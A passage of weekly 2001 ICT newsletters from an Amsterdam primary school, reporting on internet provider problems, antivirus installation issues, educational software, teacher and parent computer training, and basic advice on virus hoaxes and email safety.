 2. bij de kleuters kan een keuze gemaakt worden tussen printen in kleur en printen op de zwart-wit netwerkprinter
 3. de nascholingscursussen op ict-gebied zijn afgesproken en zullen meegenomen worden in onze cursus klassenmanagement.
 4. we hebben problemen met ons data verbruik via UPC (priority telecom). We kunnen het niet meer meten. We overwegen om toch maar een poging te wagen op het Kennisnet. Daar houden jullie van op de hoogte.
 5. Dirk en ik doen regelmatig postings in de nieuwsgroep nl.onderwijs.nieuwe-media. Neem eens een kijkje.
 6. op onze web-site staat nu een stuk te lezen over de regels over het computergebruik. We vragen om commentaar en aanvulling. Willen jullie daar ook een bijdrage aan leveren? Onze chat is voor jullie natuurlijk ook te gebruiken.

graag jullie reactie op deze mail.
groeten,
Karin en Dirk

_____________________________________________
Openbare Basisschool Rosa Boekdrukker
Vancouverstraat 3 - 5
1056 DT Amsterdam
te/fax: 020 6128000
http://www.rosaboekdrukker.nl
email: info@rosaboekdrukker.nl

2001-10-12 w41

+++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 41 - 2001
Waar zijn we de afgelopen week mee bezig geweest?
+++++++++++++++++++++++++++++++++++++++++++++++++

UPC/Kennisnet

Wij hebben de afgelopen twee jaar als provider A2000 gebruikt, We hebben daar een zakelijk abonnement met een beperkt dataverkeer, Dat konden we tot nu toe via een zogenaamde "usage viewer" in de gaten houden, Maar dat lukt nu niet meer en daardoor hebben wij besloten toch maar ons netwerk aan te sluiten op Kennisnet, ondanks aIle negatieve verhalen, Afgelopen maandag en dinsdag zijn er met onze oude HUB 6 computers op Kennisnet aangesloten, We hebben nu dug eigenlijk twee netwerken: een bij A2000 en een bij Kennisnet, We kunnen nu zelf zien of Kennisnet echt zo langzaam is aIs gezegd wordt.

SOFTWARE PROBLEMEN

Zowel met het computerprogramma bij Veilig Leren Lezen aIs met het programma van Wereld in getallen hebben we problemen gehad. Wat bleek: de programma's zijn niet meegegroeid met de verbetering van de computers. Bij Veilig Leren Lezen moet de scherminstelling (pixels) op laag worden ingesteld. AIsje daarna de cd-rom die bij Huisje Boompje Beestje hoort in diezelfde computer wilt doen (800 Mhz), moet de scherminstelling weer "hoog" worden ingesteld. Zwijsen zegt: we kennen het probleem. Ze werken aan een andere versie.
Het zou erg vervelend zijn, aIs in die versie de verhoudingeffectieve werktijd en spelelement zou doorslaan naar teveel spelen, de zogenaamde "edutainment". Het lukt ons tot nu toe niet om de registratie bij VLL uit te printen. Bij wie van jullie lukt dat wel?
Bij de Wereld in Getallen werd bij het overzetten van de licentiecode beschadigd doordat de computer te snel was, De programma's mogen niet geinstalleerd worden op computers sneller dan 450MHZ.!!! !(volgens de helpdesk). We kregen gelukkig nieuwe diskettes en het bleek ook, dat de virusscanner uitgezet moest worden voor de installatie,

COMPUTERREGELS

Wij hebben een stuk geschreven over computerregels bij ons op school. Wat mag wel en wat mag niet? Hebbenjullie daar eventueel nog aanvullingen op? Te vinden op onze website bij ONS NET.

VERZENDLIJST

Wanneer iemand geen nieuwsbriefmeer wenst te ontvangen dan horen wij dat graag middels dit unieke medium. (slechts een druk op de ANTWOORD-knop).

Karin Abma
Dirk Schouten

2001-10-19 w42

+++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 42 - 2001
Waar zijn we de afgelopen week mee bezig geweest?
+++++++++++++++++++++++++++++++++++++++++++++++++

UPC/Kennisnet

We hebben nu een week met Kennisnet gewerkt. De verbinding lijkt langzaam. Dat gaan we nu extra testen door twee identieke computers naast elkaar te zetten. De een via UPC, de ander via Kennisnet.
We hebben ons opgegeven voor een Kennisnet dag op 23 november. Aanmelden via de website www.manager.kennisnet.nl/werkt lukte niet, omdat een formulierenprogramma niet werkte. De handel dus maar opgestuurd.

Server/firewall

Dirk voIgt een cursus UNIX en was deze week bezig om op de server, aangesloten op UPC een programma te laten werken, waarmee je kunt zien, of er mensen van buitenaf proberen in te breken. Een avond heeft hij de log-bestanden daarvan naar mij door laten sturen. Ongelofelijk hoe er aan de poorten wordt geklopt, maar onze FIREWALL houdt alles tegen!

Nascholing

We hebben ons bij het ABC ingeschreven o.a. voor de cursus "het gebruik van het computerlokaal door een schoolklas".
Deze week hebben we afspraken gemaakt over wat de klassen 5 t/m 8 in het computerlokaal van het OCA via tekstverwerking zullen maken.
Op school zal alles in tweetallen worden voorbereid in het klad. Bij het OCA zullen de kinderen leren hoe teksten er leuk uit kunnen zien via het tekstverwerkingsprogramma Word97. (lay-out, lettertypen, plaatjes invoegen, etc.)
Groep 5 gedichten over vriendschap
Groep 5/6 kleine verhaaltjes over dieren
Groep 6 een kookboek
Groep 7 mini werkstukjes (eventueel al typen in de klas)
Groep 7/8 een klassenkrant
Het doel van deze bijeenkomsten is om in de klas meer aan tekstverwerking te doen. Na het bezoek met de klas aan het OCA beginnen de nascholingen voor de leerkrachten. Daarover in een latere nieuwsbrief meer. De eerste nascholingen hebben te maken met tekstverwerken, aansluitend aan onze taalmethode "taalleesland".

Ouders

Deze week vroeg een ouder of wij computerlessen voor ouders kunnen verzorgen. Daar zal het laatste nog niet over gezegd zijn. We zijn van plan om met vijf ouders een proef te starten. We zijn wel allemaal enthousiast (weer een manier om ouders bij de school te betrekken), maar zien ook knelpunten:
Verzwaring taak ict-ers (voorbereiding)
Eigen leerkrachten moeten eerst goed geschoold zijn.
Buurthuizen bieden zwaar gesubsidieerde computerlessen aan.
Graag nadere informatie, als die er is.

APS licenties

We hebben bij bet APS contracten afgesloten om te zorgen, dat geregistreerd wordt, dat we met legale software werken. Die contracten worden berekend op basis van bet aantal FTE's per school. We hadden allang een contract voor Mcafee (virusscan) lopen. Nu zijn we ookjuridisch in orde met Windows 98se en Microsoft Office97.
De contracten houden in, dat ook de leerkrachten thuis de programma's mogen installeren. Voor Windows geldt: je moet bij elke computer een eigen licentie hebben. Met de upgrade van bet APS naar 98se is nu alles geregeld. Ja, die Bill Gates heeft bet aardig voor elkaar!
De week na de herfstvakantie worden aIle computers bij ons voorzien van een nieuwe versie (4.5.0) van Mcafee. Na installatie moeten de nieuwe virusgegevens regelmatig via bet internet ge-update worden. Beetje omslachtig, maar wel nodig.

Software

Graag zouden wij horen van onze "collega-scholen" welke software voor kinderen tot nu toe goed is bevallen.

Karin
Dirk

Openbare Basisschool Rosa Boekdrukker
Vancouverstraat 3 - 5
1056 DT Amsterdam
te/fax: 0206128000
http://www.rosaboekdrukker.nl
email: info@rosaboekdrukker.nl

2001-11-02 w44

+++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 44 - 2001
Waar zijn we de afgelopen week mee bezig geweest?
+++++++++++++++++++++++++++++++++++++++++++++++++

UPC/Kennisnet

We hebben nu twee identieke computers naast elkaar staan om de verschillen tussen UPC en Kennisnet te kunnen beoordelen. Het lijkt wel of de verbinding met UPC deze week niet erg vlot wil.
Deze week nog geen problemen met Kennisnet ontdekt. Groep 7 kon ter voorbereiding van een bezoek aan de raadsvergadering op het stadsdeelkantoor een spel spelen op de site van het ministerie van financien. Dat lukte via Kennisnet.

Mcafee virusscanner

Het installeren van de nieuwe versie van Mcafee geeft problemen. Zowel bij mensen thuis als op school. Maar niet in alle gevallen. Het komt voor, dat de computer blijft "hangen" tijdens het opstarten. Ofhet opstarten duurt heel erg lang. Ook gesignaleerd: bij het verschijnen van het V shield logo klapt de computer naar een blauw scherm met de opmerking FATAL ERROR!! En er zit clan niets anders op, clan om de resetknop in te drukken. Na twee of drie keer resetten verloopt alles dan verder goed.
En bij de laatste computer waar het op geinstalleerd werd (de testmachine van Kennisnet), duurde elke bewerking (muisklik) een paar minuten; dus maar gedeinstalleerd. We moeten nog uitvinden waar het nu aan ligt.

Financien.

Op de site www.ictonderwijs.nl (doorklikken naar onderwijsonline, financien) is alles te vinden over de bekostiging door het ministerie aan de scholen ten behoeve van het ict-onderwijs. We hebben uitgerekend waar we recht op hebben en wat er is uitgegeven in de jaren 1999, 2000 en 2001. AIleen de tegemoetkoming voor de millenniumproblemen is er nog niet in meegenomen.

Afgeschreven apparatuur.

Wij hebben een brief geschreven aan een gemeentelijke instelling, dat waarschijnlijk pentium I 66's voor ons heeft. En dat zou heel mooi zijn, als we die kunnen krijgen. Van diezelfde instelling hebben we al eerder apparatuur gekregen, o.a. netwerk-laserprinters die het fantastisch doen. (we hebben er nog een over)

Ouders.

Er hebben zich 5 ouders opgegeven voor computerles. Waarschijnlijk gaan we hen als een test (voor ons) drie lessen geven. Algemene computerbegrippen gekoppeld aan het gebruik van internet en e-mail.

Werkgroep.

Er is een werkgroep ICT opgericht. Die zal zich binnenkort gaan buigen over de volgende onderwerpen:
-de toepassing van de computerregels in de school
-welke software bevalt goed en aan wat voor software is nog behoefte
-wanneer zet je de computer in ten behoeve van het onderwijs
-hoe registreer je wat er aan de computers wordt gedaan
-hoe gaat het op de (na)scholingen

Site van de week.

http://145.37.208.13/zoeken/ Dit is een cursus zoeken op het internet.

Tip voor ICT-ers van De Roos

www.netsilike.nl
Misschien een hulp in de uitbreiding van jullie netwerk.

Karin
Dirk

2001-11-09 w45

+++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 45 - 2001
Waar zijn we de afgelopen week mee bezig geweest?
+++++++++++++++++++++++++++++++++++++++++++++++++

UPC/Kennisnet

Deze week zijn er problemen met de mail server van UPC. We ontvangen geen post. Gelukkig kunnen documenten (dingen die je thuis maakt en op school gebruikt worden) wel naar HOTMAIL adressen gestuurd worden. Kennisnet lijkt trager te gaan dan UPC.

E-mailadressen.

Van de week zijn er weer drie e-mailadressen toegevoegd aan de lijst. Van de 38 mensen die op onze school werkzaam zijn hebben nu 30 een e-mailadres!!

Scholing.

Groep 5/6 en groep 6 zijn deze week naar het DCA (Onderwijs Computer Centrum Amsterdam) geweest en hebben daar een les tekstverwerking gehad. Van tevoren moesten de teksten in het klad in de klas voorbereid worden. Groep 5/6 heeft een gedichtenbundel gemaakt: kleurige lettertypen en plaatjes erbij. Groep 6 heeft een kookboek gemaakt. Ook op school is er daarna al geoefend met het invoegen van plaatjes en het maken van mooie randen. Bij een van de lessen ging er een ouder mee, die zo enthousiast is, dat ze graag nog een keer meegaat.

Het wordt nu tijd om "Digiwijs" in te zetten. Dat is een computercursus voor kinderen. Het kost 1200.- en je krijgt er een groot hoek voor met heel overzichtelijke opdrachten. De aankoop houdt in, dat je het onbeperkt mag kopieren voor gebruik op school. Om dat kopieren gemakkelijker te maken is er een cd-rom bij met daarop de inhoud van het hoek. Alles steeds onder het kopieerapparaat leggen hoeft dus niet. Leerkrachten kunnen er natuurlijk ook mee oefenen. De oefeningen die de kinder en op het DCA hebben gedaan, staan ook in het cursusboek.

Computerles voor ouders.

In het buurtcentrum in de Chassestraat worden computercursussen aan volwassenen gegeven. Dat hebben we uitgezocht, voordat we iets aan de ouders gaan aanbieden op school. We denken erover om de ouders voor te stell en, dat ze eerst de basis computer cursus in het buurthuis gaan volgen en daarna bij ons leren e-mailen en internetten. Mensen kunnen zich nu opgeven voor een reeks lessen die in januari begint. Het houdt in: 6 lessen van twee uur. Kosten: 1130,- U110,- voor mensen met stadspas) + 120.- materiaalkosten. Er is een cursus voor beginners en een cursus voor gevorderden. Er wordt geen intemetles gegeven, want dat hebben ze daar nog niet.

Werkgroep.

Volgende week zal de werkgroep ICT voor het eerst bij elkaar komen. Dan worden de doelstellingen van de werkgroep vastgesteld en taken verdeeld. U hoort volgende week meer.

Computertafels.

We hebben een computertafel besteld bij de firma Projecta. Ik kreeg die tip van Henny Kuijk van de Admiraal de Ruyter. Ais de tafel bevalt, bestellen we er meer. We hebben namelijk gebrek aan meubilair in de school. De bestelde tafel zal op functionaliteit worden uitgetest door groep 5. We hebben er toch maar wel wielen bij besteld, omdat er toch altijd met apparatuur geschoven wordt als een lokaal leeg moet voor de schoonmaak. We zullen er zelf een contactdoos onder monteren.

Sites van de week.

www.onderwijsweek.nl
www.kennisnet.nl , docent, lesbrieven, rekenweb (hele leuke rekenspelletjes die je online kunt spelen)
www.veiliglerenlezen.nl
Deze link gehoord tijdens een workshop op bet ABC. Heeft iemand ervaring met de "manager" bij Veilig Leren Lezen?

Karin
Dirk

2001-11-16 w46

+++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 46 - 2001
Waar zijn we de afgelopen week mee bezig geweest?
+++++++++++++++++++++++++++++++++++++++++++++++++

UPC/Kennisnet

We hebben DOg steeds problemen met de mail server van UPC. Ook na telefoneren met UPC veranderde er niks. Volgende week meer. De e-mails druppelen nu binneD. Geen tijd om bet precies uit te zoeken. Snelheid van Kennisnet met aDders clan die van UPC. Wel valt op, dat via Kennisnet sommige sites Diet bereikbaar zijn.

Scholing.

Groep 7 en 7/8 zijn deze week naar bet OCA (Onderwijs Computer Centrum Amsterdam) geweest. Groep 7 heeft naar aanleiding van een taalles werkstukken gemaakt over wateroverlast en watergebrek. Ze moesten afbeeldingen invoegen in een netjes opgemaakte tekst. Groep 7/8 heeft een klassenkrant gemaakt. Ze hebben o.a. foto's ingescand. Alle klassen hebben alles tot nu toe goed voorbereid. Wat ze leren op bet OCA kan na afloop allemaal teruggevonden worden in "Digiwijs".

"Digiwijs"

Een computercursus voor kinderen. We zijn deze week druk bezig om dat hoek te kopieren. Onze concierge, John, is heel handig, heeft extra dik papier besteld, alles afgedrukt, de voorkant in kleur. Vooral de pagina's "hoe was bet ook alweer?" blijken al heel handig, nadat de kinderen op bet OCA zijn geweest.

Computerles voor ouders.

We hebben de ouders die bij ons op school computerles willen hebben voorgesteld eerst de basiscursus te volgen in bet buurtcentrurn in de Chassestraat. Het probleem was: de cursussen zijn daar 's avonds, zij vinden dat een probleem. Zij willen graag een cursus volgen als de kinderen op school zijn. We zijn nu in onderhandeling om een cursus overdag te laten plaatsvinden. Als dat allemaal lukt, kunnen ze daarna bij ons op school leren e-mailen en intemetten. We hebben, mede door onze goede contacten met onze leverancier (PC-Dokter), afspraken kunnen maken voor ouders die een computer willen kopen. Ouders van de RB kunnen daar computers met korting kopen. Korting afhankelijk van aankoopbedrag e.d.

Werkgroep.

De werkgroep ICT is voor het eerst bij elkaar gekomen. De doelstellingen zijn bijgesteld en bet volgende zal worden gedaan:
-de regels voor bet computergebruik zullen kritisch worden bekeken.
-er zal worden nagegaan welke software wel en welke met bevalt
-En we proberen uit te vinden of er iemand in de school (of ergens in Nederland) een goede registratieaanpak heeft: "wie is er aan de beurt om aan de computer wat te doen?"
De volgende bijeenkomst van de werkgroep is op 10 december.

Computertafel.

De computertafel is aangekomen, mooi! John heeft hem meteen in elkaar gezet. Het gebruik van de tafel wordt uitgetest door groep 5. De tafel is groot: 120 breed en 80 diep. Er is een contactdoos met schakelaar onder gemonteerd .Dat is handig, want nu kun je, na afsluiten van de computer, de andere apparaten (geluidsboxjes printer, monitor en andere spullen) in een keer uitschakelen.

Windows 3.11

We hebben nu de een na laatste windows 3.11 (computer 7, een pentium 120) computer vervangen door computer 49 (pentium 800).
Er is nu nag een windows 3.11 over, een pentium 75. Die twee computers gaan me wel aan het hart. Het waren de eerste computers na de Comenius-computers. Het waren oak de eerste computers die ik als ICT-er heb mogen kopen. Die pentiums werden aangeschaft omdat er computers met geluid moesten komen voor Veilig Leren Lezen. Ze hebben hun dienst heel erg bewezen. We houden er nog een tot de huidige groep 3 kan lezen. En dan zal oak de laatste 3.11 computer een ander leventje tegemoet gaan. Dirk ziet nag mogelijkheden voordat een schroothoop hen ontvangt.. .snik...
Dirk: "Helemaal geen schroothoop voor deze prima computers. Het zijn uitstekende internet servers!"

Kennisnetwerkt

Op vrijdag 23 november gaan Dirk en ik naar de Aristo-zalen om ALLES te horen over Kennisnet (de technische kant, zowel als de inhoudelijke kant).
We zullen op woensdag 21 november tijdens de activiteiten van de www.onderwijsweek.nl niet gaan luisteren naar wat Amsterdam Oud-Zuid doet aan ICT en wat CIAO eraan doet We willen op dit moment vooral praktisch bezig zijn met waar onze school nu behoefte aan heeft. Omdat we nag maar een paar weken aan Kennisnet hangen en daar ruim 200 gulden per maand aan betalen en we nog niet precies weten hoe dat allemaal werkt hebben we ons daar een aantal weken geleden voor opgegeven. De kringen, het inloggen, blackboard. Allemaal nieuw. Een leerkracht bij ons doet een cursus, waarbij ze gebruikt maakt van het blackboard bij Kennisnet. Ze loopt voor op mij! Ik snap er nag niks van.

Beveiliging

Dirk is weer heel druk bezig geweest om de kracht van de FIREWALL te testen Op het hele WWW zoekt hij programma's om de veiligheid te testen. Onze beveiliging is tot nu toe zo sterk, dat hij er zelf op een gegeven moment niet meer inkwam!

Technika10

We gaan uitzoeken of er voor de naschoolse activiteiten ook cursussen van technika 10 mogelijk zijn. Hoeveel computers moeten er dan in een ruimte beschikbaar zijn? Kunnen we een karretje met laptops aanschaffen? Dat zou dan meteen ook heel handig zijn om eventueel cursussen voor ouders te verzorgen: en dat in het kader van De Brede School.

Site van de week:

www.maki.nl Hier is allerlei informatie over software voor kinderen te vinden. Oak kun je je daar aanmelden voor het zeer informatieve wekelijkse E-zine (elektronisch magazine).
www.kennisnet.nl Je kunt je aanmelden bij "communities". Dat zijn jaarklasgroepen voor leerkrachten, waar je informatie kunt uitwisselen over lessen e.d. b. v. voor groep 3 en 4 zijn ze nu informatie voor Sinterklaas aan het verzamelen. Die worden weer op de site van de "digischool" gezet.

Karin
Dirk

p.s. Wij zijn benieuwd eens wat van jullie te horen.

2001-11-23 w47

+++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 47 - 2001
Waar zijn we de afgelopen week mee bezig geweest?
+++++++++++++++++++++++++++++++++++++++++++++++++

UPC.

We hebben problemen gehad met de mail server van UPC. Post kwam soms wel aan, maar vaak niet of dagen later. We kregen van de week een brief, dat we een maand abonnementskosten niet hoeven te betalen vanwege die problemen.

Scholing.

Groep 7 en 7/8 zijn vorige week naar bet OCA (Onderwijs Computer Centrum Amsterdam) geweest. Groep 7 moest maandag nog een voorkant voor hun werkstuk maken. Dat deden ze op school. Fantastisch wat die kinderen in zo'n korte tijd geleerd hebben! Volgende week gaat de laatste klas: groep 5. Zij gaan gedichten maken over vriendschap. Ze hebben in de klas al geoefend met verschillende lettertypen.
Volgende week is ook de eerste nascholingscursus voor een deel van ons team. Tekstverwerking.

Zwijsen.

De firma Zwijsen belde op naar aanleiding van een klachtenbrief die ik heb gestuurd over bet computerprogramma van Veilig Leren Lezen. Ze passen bet programma niet meer aan, want ze zijn bezig aan een geheel nieuwe versie ervan. Die komt in 2003 op de markt. Scholen die vanaf januari 2002 nog extra licenties voor bet oude programma willen kopen krijgen korting. Een extra licentie zal dan slechts (!) 175.- kosten!
Ik heb gevraagd of wij mee mogen doen als testschool voor bet nieuwe programma. Daar horen we nog van.

Computerles voor ouders.

Bij bet buurthuis de Tagerijn zal in januari een computercursus starten speciaal voor ouders van de Rosa Boekdrukker. Er is een apart tijdstip overdag geregeld, omdat voor veel ouders 's avonds een probleem is. Volgende week gaan er briefjes mee met de kinderen, omdat er nog een paar plekken open zijn.

De Maki-site. (www.maki.nl)

Ook daar heb ik me opgegeven als testschool voor software. Maandag moet ik iemand van die site terugbellen voor nadere afspraken.

Kennisnetwerkt.

Op vrijdag 23 november zijn Dirk en ik naar de Aristo-zalen geweest om ALLES te horen over Kennisnet (de technische kant, zowel als de inhoudelijke kant). Vandaar de iets verlate bezorging van de nieuwsbrief van deze week. Op deze bijeenkomst kregen we van alles te horen over de mogelijkheden van de site van Kennisnet en dat Kennisnet een gereedschap zal worden bij bet ICT onderwijs. We werden met echt enthousiast over de mogelijkheden, omdat er vooral veel verteld werd over wat er op de site te vinden is, maar met over wat je er dan mee in de klas allemaal kan doen.

Els Verschure van het OCA (onderdeel van het ABC) hield een uitstekende voordracht waarin ze hoopt, dat aIle ICT initiatieven in Amsterdam gebundeld zullen worden, en niet gezien zullen worden als concurrentie van elkaar. Na afloop vertelde ze dat ze de Rosa Boekdrukker kinderen had zien werken aan bun teksten.

Kennisnet werkt NIET.

We ondervinden eigenlijk regelmatig probleempjes met Kennisnet. Het is niet betrouwbaar. Soms gaat alles normaal en dan weer niet. Dan kun je geen enkele pagina bezoeken. Eerst ga je denken: het ligt aan ons. Maar als je dan na een tijdje gaat bellen met bet service-nummer wordt een ingewikkelde oplossing geboden. En als je dan even later naar je computer gaat, dan is er weer niks aan de hand.
Het lijkt wel een auto die op vuile brandstof loopt.

Nieuwsgroep nl.onderwijs.nieuwe-media.

Ik heb in de nieuwsgroep 2 vragen gesteld. Wie heeft er een handig registratiesysteem? Nog niets opgeleverd.
En een vraag over Mcafee, ons anti-virus programma. Als ik bet installeer op de nieuwe pentium800 computers blijft de computer na elke muisklik heel lang "hangen" (met bet zandlopertje). Er is een oplossing geboden, die ik volgende week zal proberen. We kunnen het contract niet opzeggen, want dat moet drie maanden voor de beeindiging van de looptijd en daar is het nu te laat voor. We hebben nu ook door deze nieuwsbrief een suggestie van de echtgenoot van een collega ontvangen. Lang leve deze nieuwsbrietf!

Werkgroep.

Het is geweldig om mee te maken, dat collega's uit de werkgroep zich nu ook met de computers bemoeien. Ze zijn bezig om de inhoud van de computers te inventariseren en nemen met collega's door welke software bevalt. Zo wordt de betrokkenheid met ICT veel groter.

Teller.

Een probleem van ons abonnement bij UPC is dat als we teveel dataverkeer hebben, we bij moeten betalen. Ons verbruik konden we zien op UPC's 'usage viewer'. Die was al een tijdje stuk en daardoor kregen we een onverwacht rekening van f 400,-- voor teveel dataverkeer. Dat was balen. Maar nu hebben we onze eigen 'usage viewer' en kunnen we per dag en per maand bet gebruik zien (en dus onmiddellijk ingrijpen als ) Kijk op: http://nodellef5.a2000.nl/serverstat.html De teller is gemaakt door Wouter Zaaijer en is vrij te gebruiken. wouter@zaaijernet.dyndns.org

Sites van de week:

ZOEKEN
Heb je ook zo'n volle computer dat je soms bepaalde dingen niet meer kan vinden terwijl je zeker weet dat je ze op je computer hebt staan? Dan is bet zoekertje 'Wilbur' wat voor jou. http:/ /wilbur.redtree.com

SINTERKLAAS
Sites om leuke ideeen op te doen voor deze sinterklaasperiode.
Sinterklaasjournaal (http://www.omroep.nl/sint)
Quickstart Webgids-Sinterklaas (http://www .guickstart-webgids.nl/guickstart~Sinterklaas.html)
Sint.nl (http://www.sint.nl)
de Sinternetsite (www.sintnicolaas.org)
Sinterklaas in de klas. (http://sinterklaas.kennisnet.nl/)

Storingen.

Niemand zat deze week vast met zijn/haar computer. Alles werkte. Geen EHBO hoeven toe te passen.

Karin

2001-11-30 w48

+++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 48 - 2001
Waar zijn we de afgelopen week mee bezig geweest?
+++++++++++++++++++++++++++++++++++++++++++++++++

Virus-hoaxen.

Vorige week vroeg een collega mij wat ze aan een virusmelding over een "virtual card" moest doen. Ze kreeg toen bet volgende advies:

Het volgende is gekopieerd van http://antivirus.pagina.nl Kijk ook bij http://www. virusalert.nl/

Een hoax is een (virus)waarschuwing voor een nep-virus. Het vraagt om bijgevoegd bericht naar iedereen door te sturen waardoor het gewenste effect wordt bereikt, nl. het overbelasten c.q. platleggen van (mail)servers.
Een variant op de hoax is de zgn. kettingbrief. Deze is minder verwarrend, maar geeft hetzelfde effect als een hoax. Een kettingbrief-mail vraagt om een bepaald mailtje door te sturen om dat dit bijvoorbeeld een goed doel dient, of om op te komen tegen een bepaald besluit etc.
Een hoax is makkelijk te herkennen.
Een hoax is over het algemeen namelijk voorzien van de tekst "stuur dit bericht naar zoveel mogelijk mensen door". Een hoax kan soms jarenlang over het internet zwerven. Het bericht wordt van de ene afzender naar de andere gestuurd.
Oplossing tegen de verspreiding is simpel. Stuur nooit een dergelijk bericht door! Ook als jij een waarschuwing ontvangt die echt is kun je beter je kennissen informeren door ze bijvoorbeeld te wijzen op nieuwsbrieven van VirusAlert.nl e.a. Abonnees ontvangen dan rechtstreeks de waarschuwingen en mail servers worden niet platgelegd en toch is iedereen goed geinformeerd
Hieronder een lijst met "subject" of "onderwerp" omschrijvingen van berichten die als hoax verstuurd worden.
-ICQ start met gratis dienstverlening als je dit niet doorstuurt aol.exe
-Cleanmgr.exe (HOAX-NL-MD-20010401)
-Sulfnbk
-St. Patrick's Day Irish Virus Alert
-Lotus notes worm Hoax
-Honor System Virus Hoax (=discount)
-A Virtual! card for You

Mcafee.

Alle pogingen om het programma goed te laten werken zijn nog mislukt, ondanks de goede raadgevingen (bedankt, Peter!). Mail met hulpvraag naar Mcafee gestuurd. Maar op de valreep: per 1 december a.s. loopt het contract af dat het APS heeft afgesloten met Mcafee en met ons (de scholen). Mcafee heeft tot nu toe alleen een voorlopig voorstel voorgelegd aan het APS. Vandaar, dat we opeens een ontsnappings mogelijkheid hebben aan het contract. Daarover kwam deze week een brief. Meteen de retourbrief ingevuld: we stoppen het contract. Nu op ons gemak bekijken, hoe we verder gaan. Suggesties?

Kennisnet.

De eerste haze brief is de deur uit. Dinsdagmorgen was op de op kennisnet aangesloten computer alleen www.kennisnet.nl te benaderen, heel langzaam. Andere sites onbereikbaar. Terwijl de computer ernaast, die op UPC is aangesloten, heel vlot op internet ging. Antwoord van Kennisnet, de volgende dag, is een soort standaardbrief, die ervan uitgaat, dat het probleem aan ons eigen netwerk ligt. Maar dat kan niet, want we hebben die twee computers naast elkaar staan voor de wedstrijd: werkt Kennisnet? Zoniet: doet UPC het? Nou die deed het. De mail server van UPC werkt weer normaal.

EHBO.

De volgende problemen deden zich deze week voor:
- een cd deed het met (lag er verkeerd-om in)
- computer liep vast (instelling veranderd, zodat hij met in een energiezuinige stand of slaapstand terechtkomt)
- linker muisknop-klik deed het niet meer (muis vervangen)

Werkgroep ICT.

We moeten aile computers nalopen en kijken welke educatieve software erop zit. Daarna vragen we aan de leerkrachten bij elk programma: of ze ermee werken, of het bevalt en waarom wel of niet, en of ze registreren of ermee gewerkt is.
Waarschijnlijk kunnen een aantal programma's de prullenbak in. We hebben heel veel OWG software die niet op windows 98 draait. We moeten inventariseren welke software van hen we nog willen houden, en dus opnieuw zullen moeten bestellen.

Computercursus voor ouders.

Deze week zijn briefjes meegegaan met een oproep aan ouders of ze mee willen doen met de computercursus. Maandag bespreken we het vervolg met iemand van de Tagerijn.

Grafisch Lyceum.

Afspraak gemaakt met een docent en een manager om te praten over stageplaatsen aan onze school voor leerlingen van het Grafisch Lyceum die onder meer een website voor onze school gaan maken.

Gebruikte apparatuur.

Mail ontvangen en weer beantwoord van de gemeentelijk dienst die ons zo goed voorzien heeft en die nog wat apparatuur aan de school wil schenken. We kunnen weer rekenen op 10 computers!

Maki.nl.

Ik heb contact gehad met iemand van de redactie van de site: www.maki.nl. Dit omdat ik een klacht had gestuurd over de software bij Veilig Leren Lezen en Wereld in Getallen. Hoofdvraag: hoe komt het, dat educatieve uitgeverijen hele dure software verkopen en die programma's niet aanpassen aan de zich ontwikkelende technieken van de hardware? Maki was al door meer mensen hierover benaderd. T.z.t. zullen wij het op hun site toelichten.
Volgend jaar kost een nieuw licentie voor Veilig Leren Lezen nog 125.- (vorige week meldde ik abusievelijk 175.-) Misschien koopt een school dan wel het hele programma voor 875.- en dan komen ze er na een jaar achter dat het programma vervangen gaat worden. Je kunt het natuurlijk nog wel gebruiken, maar de beeldscherminstelling zorgt voor rare pixels!!!

Scholing.

Groep 5 heeft deze week gedichten over vriendschap gemaakt. Binnenkort zaI het werk van onze klassen op onze website te zien zijn.
De cursus tekstverwerken voor de leerkrachten van de groepen 4 t/m 8 ging niet door wegens ziekte van de docent.

E-mail.

Dirk is begonnen om elke klas een eigen e-mailadres toe te kennen. Zo kunnen we mailen naar Sinterklaas en de schooltelevisie e.d. vanuit de eigen klas.

Sites van de week:

http://sinterklaas.pagina.nl Je kunt er zelfs patronen voor sint en piet pakken op vinden! ! !!
www.vives.nl een onderwijs-ict site, waar je ook het e-zine kunt lezen, met allerlei nieuwtjes op ict gebied voor het onderwijs.
De TaDtoe SQreekbeurtensite is leuk voor kinderen die materiaal zoeken voor een werkstuk of een spreekbeurt. (www.taptoe.nl)
www.netwijs.nl een zoekmachine voor kinderen.. Ook handig en veilig voor kinderen die een spreekbeurt willen houden of een werkstuk maken.

Over de drempel deze week:

Dinah: ze heeft op internet een leuk Sinterklaas knutselidee gevonden! Pietje dat door de klas duikt. Waarschijnlijk duikt ie de schoorsteen in.

Karin
Dirk

2001-12-07 w49

+++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 49 - 2001
Waar zijn we de afgelopen week mee bezig geweest?
+++++++++++++++++++++++++++++++++++++++++++++++++

Virus.

Na de waarschuwingen van vorige week over nep-virussen, werden we afgelopen weekend door een echt virus getroffen. Ais ik nu goed had opgelet, had ik kunnen lezen in de waarschuwing van Virus-alert over "bad trans". We hebben het door problemen in het weekend thuis op school kunnen voorkomen.
Tips:
- schrijf je in voor de nieuwsbrief van Virusalert en lees die ook.
- zorg voor een goede virus scanner die je regelmatig update.
- zet in Outlook Express het voorbeeldvenster uit, want daarmee open je in zekere zin ook al je e-mail.
- Maak nooit een attachment open, alsje niet zeker bent van de inhoud en/of de afzender. Je kunt de boel weggooien en de zender vragen ofhij je ook echt heeft gemaild.
- Outlook Express is een e-mail programma met risico's Het is ook mogelijk om met een ander programma te werken, bijvoorbeeld Eudora

Mcafee.

Door alle virus perikelen weer een poging gedaan om Mcafee goed te installeren. Op de nieuwe, snelle computers lukt dat niet. Maar op een oude ging het prima. Zelfs het updaten van de virusbestanden via de site van Mcafee was geen probleem. En de computer bleef lopen als een zonnetje.
Op een hernieuwde vraag aan Mcafee hebben we nog geen antwoord.
We zijn dus nog zoekende naar een goede beveiliging.

Kennisnet.

